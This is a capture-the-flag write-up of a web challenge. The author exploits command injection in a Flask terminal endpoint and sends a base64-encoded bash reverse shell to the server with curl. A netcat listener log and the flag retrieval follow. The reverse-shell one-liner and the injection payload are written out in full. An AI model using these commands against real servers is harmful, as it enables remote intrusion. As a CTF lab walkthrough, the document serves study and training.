CrossCTF_2018: the Terminal

Category: Web Points: 401 Description:

How long more can you stand it?


This challenge was really fun. Firstly, accessing the challenge gives us a futuristic-like terminal and some cryptic messages,


What does those mean? Well, looking at our network console, we find requests to other URLs,


Looking at the output, that seems strangely like Unix's date command output, let's see if we can spoof that request and try something else like ls.


Oh look, that's nice, let's see if we can spawn a reverse shell and call it a day? Well, attempting an unescaped bash reverse shell proved fruitless since / does not play nice with Flask, so we can use base64 to encode our command and pipe it through to bash on the server!

$ echo 'bash -i >& /dev/tcp/ 0>&1' | base64

Now that we have our payload, we can move on to encoding it with spaces and trying to get our reverse shell

$ curl '|%20base64%20-d%20|%20bash'

On our server side,

$ nc -nvlp 31337 listening on [any] 31337 ... connect to [] from (UNKNOWN) [] 35774 bash: /root/.bashrc: Permission denied theterminal@9d629bb237f6:/backend$

Woot! Let's see if we can get a flag!

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [] from (UNKNOWN) [] 35776
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$ cd /home
cd /home
theterminal@9d629bb237f6:/home$ ls
theterminal@9d629bb237f6:/home$ cd theterminal
cd theterminal
theterminal@9d629bb237f6:/home/theterminal$ ls
theterminal@9d629bb237f6:/home/theterminal$ cat the_flag_is_here_not_elsewhere
cat the_flag_is_here_not_elsewhere

Therefore, the flag is CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}

results matching ""

    No results matching ""